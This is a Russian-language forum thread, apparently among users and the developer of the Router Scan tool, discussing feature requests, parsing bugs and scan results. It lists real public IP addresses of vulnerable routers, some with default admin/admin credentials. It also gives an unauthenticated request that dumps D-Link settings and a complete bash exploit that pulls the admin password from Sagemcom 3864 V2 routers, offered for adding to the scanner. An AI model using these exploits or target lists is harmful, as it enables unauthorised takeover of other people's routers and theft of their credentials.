А что здесь не понятного? В black list входят точки которые Routerscan не может открыть, а раз он не может то и смысла нет пробовать. В white лист входят точки которые Routerscan 100% может открыть. После сканирования программа проверяет точки. И если есть точки которые находятся в white листе но по каким то причинам не были открыты пробует еще раз про сканировать такие точки. А статистику отправлять так же как и на http://3wifi.tk/. Касперский мешает отправлять ГУДЫ на этот сайт? Я просто не пользуюсь антивирусами)
По этому лучше сохранить goog result таблицу в формате CSV и делать с ней какие угодно вещи, вплоть изучения наизусть
Блин, не смог удержаться, улыбнуло (из лога Routerscan) - "Apache/2.2.22 (Debian) (Prof-Trade | Ножнички там всякие, бигуди)"
D-Link DIR-640L (Hardware Version: A2, Firmware Version : 1.00RU) https://46.188.7.56/ D-Link DIR-330 (Firmware Version: 1.23) https://79.120.1.12/ http://81.88.117.21/ D-Link DIR-130 (Firmware Version: 1.22, 1.24) http://78.24.177.90/ http://78.24.176.50/ TRENDnet N150 Wireless Router TEW-712BR http://83.167.124.78:8080/ Sapido BR261c AC 750Mbps Dual-Band Wireless Router http://46.188.3.34/ LevelOne SC1B7346, firmware: Version 1.0 Release 12 (определяется, но не парсит данные) http://62.118.136.193/ Akado (Technicolor) defaults: admin/admin http://46.39.40.30:8080/ http://46.39.44.72:8080/ http://83.167.127.20:8080/ pfSense https://81.88.117.156/ https://83.167.105.111/ https://83.167.115.45/ https://92.243.171.46/ https://92.243.185.79/ TP-Link http://46.39.40.96/ По поводу MikroTik'ов уже когда-то писал на сайте RouterScan'а; хорошо бы доделать, а то 6-ую версию неправильно парсит: https://yadi.sk/i/UGSyALw6iTrLK Вот, на всякий случай, несколько примеров: v6.22 http://[email protected]/ v6.27 http://[email protected]/ v5.24 http://[email protected]/
Прошу рассмотреть на добавление такой тип роутеров Huawei Technologies HG8245A/HG8240A в реале называется терминал GPON EchoLIfe HG82240A/HG8245A пс: вроде в списках не нашел.
Address: http://77.121.225.141/Time: 16 ms Device: TP-LINK TL-WR841N Address: http://77.121.225.164/Time: 0 ms Device: TP-LINK TL-WR740N Address: http://77.121.225.203:8081/Time: 16 ms Device: TP-LINK TL-WR340G Address: http://77.121.225.205/Time: 15 ms Device: MikroTik RouterOS v6.29.1 Address: http://77.121.227.52/Time: 0 ms Device: TP-LINK TL-WR741N Address: http://77.121.227.121/Time: 15 ms Device: D-Link DIR-300NRU rev.B6 Address: http://77.121.227.164/Time: 0 ms Device: TP-LINK TL-WR740N Address: http://77.121.227.211/Time: 250 ms Device: ASUS WL-520gC Address: http://77.121.228.21/Time: 31 ms Device: TP-LINK TL-WR720N Address: http://77.121.228.35:8081/Time: 15 ms Device: RT-N10E Address: http://77.121.229.220:8081/Time: 156 ms Device: RT-N10E Address: http://77.121.231.60/Time: 32 ms Device: TP-LINK TL-WR841N Address: http://77.121.232.46/Time: 0 ms Device: TP-LINK TL-WR740N Address: http://77.121.232.86/Time: 16 ms Device: TP-LINK TL-WR720N Address: http://77.121.232.200/Time: 32 ms Device: TP-LINK TL-WR740N Address: http://77.121.233.8/Time: 0 ms Device: ASUS RT-N11P LAN IP: 192.168.1.1 LAN Subnet Mask: 255.255.255.0 Address: http://77.121.233.8:8080/Time: 0 ms Device: ASUS RT-N11P LAN IP: 192.168.1.1 LAN Subnet Mask: 255.255.255.0 Address: http://77.121.233.143/Time: 0 ms Device: TP-LINK TL-WR740N Address: http://77.121.234.235/Time: 0 ms Device: TP-LINK TL-WR740N Address: http://77.121.235.33/Time: 0 ms Device: TP-LINK TL-WR340G уязвимости не сработали.
Ребят, когда я вижу большое кол-во IPшников в заказах на добавление, меня это отпугивает и снижает мотивацию. Выкладывайте маленькими порциями Ну а по делу - мне сегодня вечером нужно будет переключиться на другой проект. Пока занимаюсь правками в коде GUI.
Отдаёт настройки без авторизации Code: POST /my_cgi.cgi HTTP/1.1 request=no_auth&request=load_settings&table_name=fw_ver&table_name=wan_info&table_name=lan_info&table_name=wireless_info
По окну программы пожелание, чтоб при закрытии программы сохранялись его размер и расположение на экране монитора. СПС заранее.
Последний отпарсился корректно, когда я зашёл и вышел при помощи браузера. Кстати, если я не обознался, именно вы помогли мне тогда написать парсер для Mikrotik.
Все правильно - последний ip это MikroTik с ОС v5.24, они парсились нормально. Я его привел, чтобы можно было проверить, что ничего не сломалось. Структура данных изменилась с версии 6.8 или 6.9. И да, вы не обознались
Как релиз будет, всё напишу. 25/tcp - SMTP, почтовые серверы. Их нет особого смысла сканировать, у них свой протокол отличный от HTTP. Лично у меня на этих адресах нет подобного эффекта, порты закрыты. Скорее всего так работает ваш антивирус, брандмауэр или что-то ещё.
Новый сплойт по получению паролей с вэбиморды роутера Sagemcom 3864 V2 (таких много есть у Ростелекома) Code: #!/bin/bash ######################################### # Exploit Title: Sagemcom 3864 V2 get admin password # Date 2015-08-15 # Author: Cade Bull # Software Link: null # Tested on: Sagemcom F@ST 3864 V2 # Version: 7.253.2_F3864V2_Optus ######################################### # The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms # the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials if [ "$1" != "" ] then IP_ADDRESS="$1" else echo "Usage : $0 IP_ADDRESS" exit 1 fi USER_PASSWORD=`wget http://$IP_ADDRESS/password.html -t 1 -q -O - | grep "pwdAdmin" | tr " = " "\n" | grep "'" | tr -d "';" ` echo "admin password = $USER_PASSWORD" Может возможно его запилить в RouterScan.
А можно в Router Scan сделать ручное(пользовательское) редактирование столбцов(поменять столбцы местами(IP, MAC и т.п.)).